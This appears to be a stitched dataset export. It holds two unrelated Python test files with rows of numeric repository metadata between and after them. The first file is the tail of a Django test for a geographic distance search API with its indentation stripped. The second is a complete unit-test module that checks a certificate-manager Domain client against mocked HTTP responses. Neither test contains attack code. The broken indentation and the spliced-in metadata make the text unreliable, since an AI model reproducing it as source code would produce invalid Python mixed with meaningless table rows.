# Mid spots are 50 meters away from the center
# Outer spots are 100 meters away from the center
# Far out spots are 120 meters away, at the north
# Creating these from the outside in, so things that sort by
# primary key will give bad results for things that should be
# sorted by distance
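# (The degree offsets below assume roughly 111,320 m per degree of latitude
# and, at latitude 30, 111,320 * cos(30 deg) ~= 96,406 m per degree of
# longitude; e.g. 10 m / 96,406 m ~= 0.0001037285 deg, matching the "inner"
# longitude offsets.)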
for i in range(0, 100):
far_out = Spot.objects.create(
name="Far Out %s" % i,
latitude=Decimal("30.0010779783"),
longitude=Decimal("-40.0"),
)
far_out.save()
outer_top = Spot.objects.create(
name="Outer Top",
latitude=Decimal("30.0008983153"),
longitude=Decimal("-40.0"),
)
outer_top.save()
outer_bottom = Spot.objects.create(
name="Outer Bottom",
latitude=Decimal("29.9991016847"),
longitude=Decimal("-40.0"),
)
outer_bottom.save()
outer_left = Spot.objects.create(
name="Outer Left",
latitude=Decimal("30.0"),
longitude=Decimal("-40.0010372851"),
)
outer_left.save()
outer_right = Spot.objects.create(
name="Outer Right",
latitude=Decimal("30.0"),
longitude=Decimal("-39.9989627149"),
)
outer_right.save()
mid_top = Spot.objects.create(
name="Mid Top",
latitude=Decimal(" 30.0004491576"),
longitude=Decimal("-40.0"),
)
mid_top.save()
mid_bottom = Spot.objects.create(
name="Mid Bottom",
latitude=Decimal("29.9995508424"),
longitude=Decimal("-40.0"),
)
mid_bottom.save()
mid_left = Spot.objects.create(
name="Mid Left",
latitude=Decimal("30.0"),
longitude=Decimal("-40.0005186426"),
)
mid_left.save()
mid_right = Spot.objects.create(
name="Mid Right",
latitude=Decimal("30.0"),
longitude=Decimal("-39.9994813574"),
)
mid_right.save()
inner_top = Spot.objects.create(
name="Inner Top",
latitude=Decimal("30.0000898315"),
longitude=Decimal("-40.0"),
)
inner_top.save()
inner_bottom = Spot.objects.create(
name="Inner Bottom",
latitude=Decimal("29.9999101685"),
longitude=Decimal("-40.0"),
)
inner_bottom.save()
inner_left = Spot.objects.create(
name="Inner Left",
latitude=Decimal("30.0"),
longitude=Decimal("-40.0001037285"),
)
inner_left.save()
inner_right = Spot.objects.create(
name="Inner Right",
latitude=Decimal("30.0"),
longitude=Decimal("-39.9998962715"),
)
inner_right.save()
# Testing to make sure too small of a radius returns nothing
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 1,
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with no matches"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
# Testing the inner ring
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 12,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 4, "Returns 4 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]], 1, "Spot matches a unique inner spot"
)
spot_ids[spot["id"]] = 2
# Testing the mid ring
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 60,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 8, "Returns 8 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner or mid spot",
)
spot_ids[spot["id"]] = 2
# Testing the outer ring
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 110,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 12, "Returns 12 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
# testing a limit - should get the inner 4, and any 2 of the mid
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 60,
"limit": 6,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 6, "Returns 6 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
self.assertEquals(
spot_ids[inner_left.pk], 2, "Inner left was selected"
)
self.assertEquals(
spot_ids[inner_right.pk], 2, "Inner right was selected"
)
self.assertEquals(spot_ids[inner_top.pk], 2, "Inner top was selected")
self.assertEquals(
spot_ids[inner_bottom.pk], 2, "Inner bottom was selected"
)
# Testing limits - should get all of the inner and mid, but
# no outer spots
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 101,
"limit": 8,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 8, "Returns 8 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner or mid spot",
)
spot_ids[spot["id"]] = 2
# Testing limits - should get all inner and mid spots, and
# 2 outer spots
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 101,
"limit": 10,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 10, "Returns 10 spots")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
self.assertEquals(
spot_ids[inner_left.pk], 2, "Inner left was selected"
)
self.assertEquals(
spot_ids[inner_right.pk], 2, "Inner right was selected"
)
self.assertEquals(spot_ids[inner_top.pk], 2, "Inner top was selected")
self.assertEquals(
spot_ids[inner_bottom.pk], 2, "Inner bottom was selected"
)
self.assertEquals(spot_ids[mid_left.pk], 2, "Mid left was selected")
self.assertEquals(spot_ids[mid_right.pk], 2, "Mid rightwas selected")
self.assertEquals(spot_ids[mid_top.pk], 2, "Mid top was selected")
self.assertEquals(
spot_ids[mid_bottom.pk], 2, "Mid bottom was selected"
)
# Testing that limit 0 = no limit - get all 12 spots
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 110,
"limit": 0,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(len(spots), 12, "Returns 12 spots with a limit of 0")
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
for spot in spots:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
spot_ids[spot["id"]] = 2
# Testing that the default limit is 20 spaces
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 150,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(
len(spots), 20, "Returns 20 spots with no defined limit"
)
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
far_out_count = 0
for spot in spots:
if spot["id"] in spot_ids:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
else:
far_out_count += 1
self.assertEquals(
far_out_count,
8,
"Found 8 far out spots to fill in the limit of 20",
)
# Testing that with a limit of 0, we pull in all spots in range
response = c.get(
"/api/v1/spot",
{
"center_latitude": center_lat,
"center_longitude": center_long,
"distance": 130,
"limit": 0,
},
)
self.assertEquals(
response.status_code, 200, "Accepts the distance query"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
spots = json.loads(response.content)
self.assertEquals(
len(spots), 112, "Returns 112 spots with a limit of 0"
)
spot_ids = {
inner_left.pk: 1,
inner_right.pk: 1,
inner_top.pk: 1,
inner_bottom.pk: 1,
mid_left.pk: 1,
mid_right.pk: 1,
mid_top.pk: 1,
mid_bottom.pk: 1,
outer_left.pk: 1,
outer_right.pk: 1,
outer_top.pk: 1,
outer_bottom.pk: 1,
}
far_out_count = 0
for spot in spots:
if spot["id"] in spot_ids:
self.assertEquals(
spot_ids[spot["id"]],
1,
"Spot matches a unique inner, mid or outer spot",
)
else:
far_out_count += 1
self.assertEquals(far_out_count, 100, "Found all 100 far out spots")
| 31.864035 | 79 | 0.501491 | 2,302 | 21,795 | 4.622068 | 0.085578 | 0.024812 | 0.108271 | 0.084492 | 0.827726 | 0.769173 | 0.765977 | 0.755921 | 0.729981 | 0.726974 | 0 | 0.041821 | 0.391099 | 21,795 | 683 | 80 | 31.910688 | 0.759928 | 0.044873 | 0 | 0.592652 | 0 | 0 | 0.198384 | 0.002405 | 0 | 0 | 0 | 0 | 0.127796 | 1 | 0.015974 | false | 0 | 0.014377 | 0 | 0.031949 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
4c0ab34e213a6cac6f714e8bdb911bff09620f44
| 24,467 |
py
|
Python
|
tests/test_domain.py
|
broadinstitute/cert_manager_api
|
3a9c3445ff32ecd29ab47e7a049c47155b72614a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_domain.py
|
broadinstitute/cert_manager_api
|
3a9c3445ff32ecd29ab47e7a049c47155b72614a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_domain.py
|
broadinstitute/cert_manager_api
|
3a9c3445ff32ecd29ab47e7a049c47155b72614a
|
[
"BSD-3-Clause"
] | 1 |
2022-03-17T16:33:46.000Z
|
2022-03-17T16:33:46.000Z
|
# -*- coding: utf-8 -*-
"""Define the cert_manager.domain.Domain unit tests."""
# Don't warn about things that are expected to happen as part of unit testing
# pylint: disable=protected-access
# pylint: disable=no-member
import json
from requests.exceptions import HTTPError
from testtools import TestCase
import responses
from cert_manager.domain import Domain, DomainCreationResponseError
from .lib.testbase import ClientFixture
class TestDomain(TestCase): # pylint: disable=too-few-public-methods
"""Serve as a Base class for all tests of the Domain class."""
def setUp(self): # pylint: disable=invalid-name
"""Initialize the class."""
# Call the inherited setUp method
super().setUp()
# Make sure the Client fixture is created and setup
self.cfixt = self.useFixture(ClientFixture())
self.client = self.cfixt.client
self.api_url = f"{self.cfixt.base_url}/domain/v1"
# Setup a test response one would expect normally
self.valid_response = [
{"id": 1234, "name": "example.com"},
{"id": 4321, "name": "*.example.com"},
{"id": 4322, "name": "subdomain.example.com"},
]
# Setup a test response for getting a specific Domain
self.valid_individual_response = self.valid_response[0]
self.valid_individual_response["status"] = "Active"
# Setup JSON to return in an error
self.error_response = {"description": "domain error"}
class TestInit(TestDomain):
"""Test the class initializer."""
@responses.activate
def test_param(self):
"""The URL should change if api_version is passed as a parameter."""
# Set a new version
version = "v3"
api_url = f"{self.cfixt.base_url}/domain/{version}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client, api_version=version)
data = domain.all()
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response)
def test_need_client(self):
"""The class should raise an exception without a client parameter."""
self.assertRaises(TypeError, Domain)
class TestAll(TestDomain):
"""Test the .all method."""
@responses.activate
def test_cached(self):
"""The function should return all the data, but should not query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all()
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_forced(self):
"""The function should return all the data, but should query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all(force=True)
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(responses.calls[1].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.all)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
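# A minimal sketch of the caching behaviour pinned down by test_cached and
# test_forced above, assuming the usual memoization pattern; illustrative
# only, not the cert_manager implementation.
class _CachedCollectionSketch:
    """Cache the first fetch and reuse it unless force=True."""

    def __init__(self, fetch):
        self._fetch = fetch  # callable that performs the actual API request
        self._data = None

    def all(self, force=False):
        # Hit the API only when nothing is cached or a refresh is forced
        if self._data is None or force:
            self._data = self._fetch()
        return self._data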
class TestFind(TestDomain):
"""Test the .find method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will return all domains"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.find()
self.assertEqual(data, self.valid_response)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200)
api_url = f"{self.api_url}?name=example.com"
domain = Domain(client=self.client)
data = domain.find(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response[0])
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.find)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestCount(TestDomain):
"""Test the .count method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will count all domains"""
# Setup the mocked response
count = {"count": len(self.valid_response)}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count()
self.assertEqual(data, count)
self.assertEqual(responses.calls[0].request.url, api_url)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
count = {"count": len(self.valid_response[0])}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com")
self.assertEqual(data, count)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if counts cannot be retrieved from the API."""
# Setup the mocked response
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.count)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
class TestGet(TestDomain):
"""Test the .get method."""
@responses.activate
def test_need_domain_id(self):
"""The function should raise an exception without an domain_id parameter."""
domain = Domain(client=self.client)
self.assertRaises(TypeError, domain.get)
@responses.activate
def test_domain_id(self):
"""The function should return data about the specified Domain ID."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200)
domain = Domain(client=self.client)
data = domain.get(domain_id)
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_individual_response)
@responses.activate
def test_ne_domain_id(self):
"""The function should raise an HTTPError exception if the specified Domain ID does not exist."""
domain_id = 2345
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.get, domain_id)
class TestCreate(TestDomain):
"""Test the .create method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# Not going to check every permutation of missing parameters,
# but verify that something is required
self.assertRaises(TypeError, domain.create)
@responses.activate
def test_create_success(self):
"""
The function should return the created domain ID,
as well as add all parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
org_id = 4321
types = ["SSL"]
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": org_id, "certTypes": types}]
}
response = domain.create("sub2.example.com", org_id, types)
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_success_optional_params(self):
"""
The function should return the created domain ID when additional params are specified,
        as well as add the non-required parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": 4321, "certTypes": ["SSL"]}],
"description": "Example sub domain"
}
response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain")
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_failure_http_error(self):
"""
        The function should raise a ValueError if the Domain creation
        request is invalid.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=400)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["other"]
}
self.assertRaises(ValueError, domain.create, **create_args)
@responses.activate
def test_create_failure_http_status_unexpected(self):
"""
        The function should raise DomainCreationResponseError if the Domain
        creation failed with an unexpected HTTP status code.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=200)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_missing_location_header(self):
"""
        The function should raise DomainCreationResponseError if the Domain
        creation response is missing the Location header.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_domain_id_not_found(self):
"""
        The function should raise DomainCreationResponseError if the Domain
        ID cannot be found in the creation response.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
class TestDelete(TestDomain):
"""Test the .delete method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delete)
@responses.activate
def test_delete_success(self):
"""The function should return True if the deletion succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delete(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_delete_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delete, domain_id)
class TestActivate(TestDomain):
"""Test the .activate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.activate)
@responses.activate
def test_activate_success(self):
"""The function should return True if the activation succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.activate(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_activate_failure_http_error(self):
"""
        The function should raise an HTTPError exception if the activation
        failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.activate, domain_id)
class TestSuspend(TestDomain):
"""Test the .suspend method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.suspend)
@responses.activate
def test_suspend_success(self):
"""The function should return True if the suspension succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.suspend(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_suspend_failure_http_error(self):
"""
The function should raise an HTTPError exception if the suspension
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.suspend, domain_id)
class TestDelegate(TestDomain):
"""Test the .delegate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delegate)
@responses.activate
def test_delegate_success(self):
"""The function should return True if the delegation succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delegate(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_delegate_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types)
class TestRemoveDelegation(TestDomain):
"""Test the .remove_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.remove_delegation)
@responses.activate
def test_remove_delegation_success(self):
"""The function should return True if the delegation removal succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.remove_delegation(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_remove_delegation_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation removal failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types)
class TestApproveDelegation(TestDomain):
"""Test the .approve_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.approve_delegation)
@responses.activate
def test_approve_delegation_success(self):
"""The function should return True if the approval succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.approve_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_approval_failure_http_error(self):
"""The function should raise an HTTPError exception if the approval failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id)
class TestRejectDelegation(TestDomain):
"""Test the .reject_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.reject_delegation)
@responses.activate
def test_reject_delegation_success(self):
"""The function should return True if the rejection succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.reject_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_reject_failure_http_error(self):
"""The function should raise an HTTPError exception if the rejection failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
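# Usage sketch assembled from the call signatures exercised throughout these
# tests. `client` is assumed to be an already-configured cert_manager Client;
# nothing below executes at import time.
def _example_domain_workflow(client):
    domain = Domain(client=client)
    created = domain.create("sub2.example.com", 4321, ["SSL"],
                            description="Example sub domain")
    domain_id = created["id"]
    domain.activate(domain_id)
    domain.delegate(domain_id, 4321, ["SSL"])
    return domain.get(domain_id)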
| 32.666222 | 107 | 0.647484 | 2,928 | 24,467 | 5.28791 | 0.084358 | 0.033714 | 0.052961 | 0.063554 | 0.838468 | 0.805206 | 0.787896 | 0.776335 | 0.761997 | 0.743913 | 0 | 0.015535 | 0.250174 | 24,467 | 748 | 108 | 32.709893 | 0.828409 | 0.243389 | 0 | 0.649867 | 0 | 0 | 0.083385 | 0.048448 | 0 | 0 | 0 | 0 | 0.175066 | 1 | 0.114058 | false | 0 | 0.015915 | 0 | 0.167109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
4c0dc6446f67b743dcdbd74576706d0d6a1843b4
| 118 |
py
|
Python
|
dagr_selenium/crawl_watchlist.py
|
phillmac/dagr_selenium
|
b7417a878fe4c171625a40e746113ae2c0222335
|
